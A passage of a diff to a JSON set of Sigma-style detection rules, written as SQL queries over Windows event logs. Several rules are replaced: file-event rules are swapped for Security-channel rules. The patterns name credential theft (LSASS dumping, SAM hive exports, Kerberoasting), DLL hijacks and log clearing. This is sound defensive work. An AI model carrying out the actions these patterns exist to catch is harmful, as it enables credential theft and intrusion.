logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Windows Shell 
File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files 
(x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - 
"attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.001" + "attack.t1562.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE 
'%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_alert_enable_weak_encryption.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Enabled User Right in AD to Control User Objects", + "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "status": "test", + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "author": "@neu5ron", "tags": [ - "attack.t1204.002", - "attack.execution" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename 
LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" + "filename": "win_security_alert_active_directory_user_control.yml" }, { - "title": "Suspicious File Creation In Uncommon AppData Folder", - "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", - "status": "experimental", - "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "status": "test", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "author": "sigma", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" ], - "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" + "filename": "win_security_susp_lsass_dump.yml" }, { - "title": "Potential Remote Credential Dumping Activity", - "id": 
"6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "status": "experimental", - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "author": "SecurityAura", + "title": "ETW Logging Disabled In .NET Processes - Registry", + "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" ], - "filename": "file_event_win_remote_cred_dump.yml" + "filename": "win_security_dot_net_etw_tamper.yml" }, { - "title": "Suspicious DotNET CLR Usage Log Artifact", - "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", - "status": "experimental", - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", - "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", + "title": "Security Event Log Cleared", + "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "status": "test", + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "author": "Saw Winn Naung", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1070.001" ], "falsepositives": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + "Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" ], - "filename": "file_event_win_net_cli_artefact.yml" + "filename": "win_security_event_log_cleared.yml" }, { - 
"title": "Potential DCOM InternetExplorer.Application DLL Hijack", - "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "title": "SMB Create Remote File Admin Share", + "id": "b210394c-ba12-4f89-9117-44a2464b9511", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" + "filename": "win_security_smb_file_creation_admin_shares.yml" }, { - "title": "Suspicious Desktopimgdownldr Target File", - "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "title": "Active Directory User Backdoors", + "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "author": "@neu5ron", "tags": [ - "attack.defense_evasion", - "attack.t1105" + "attack.t1098", + "attack.persistence" ], 
"falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" ], - "filename": "file_event_win_susp_desktopimgdownldr_file.yml" + "filename": "win_security_alert_ad_user_backdoors.yml" }, { - "title": "PowerShell Profile Modification", - "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", - "status": "test", - "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "HieuTT35, Nasreddine Bencherchali", + "title": "User Added to Local Administrators", + "id": "c265cf08-3f99-46c1-8d59-328247057d57", + "status": "stable", + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1546.013" + "attack.t1078", + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "System administrator creating Powershell profile manually" + 
"Legitimate administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_powershell_profile.yml" + "filename": "win_security_user_added_to_local_administrators.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "PetitPotam Suspicious Kerberos TGT Request", + "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "status": "experimental", + "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1187" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "False positives are possible if the environment is using certificates for authentication. 
We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script 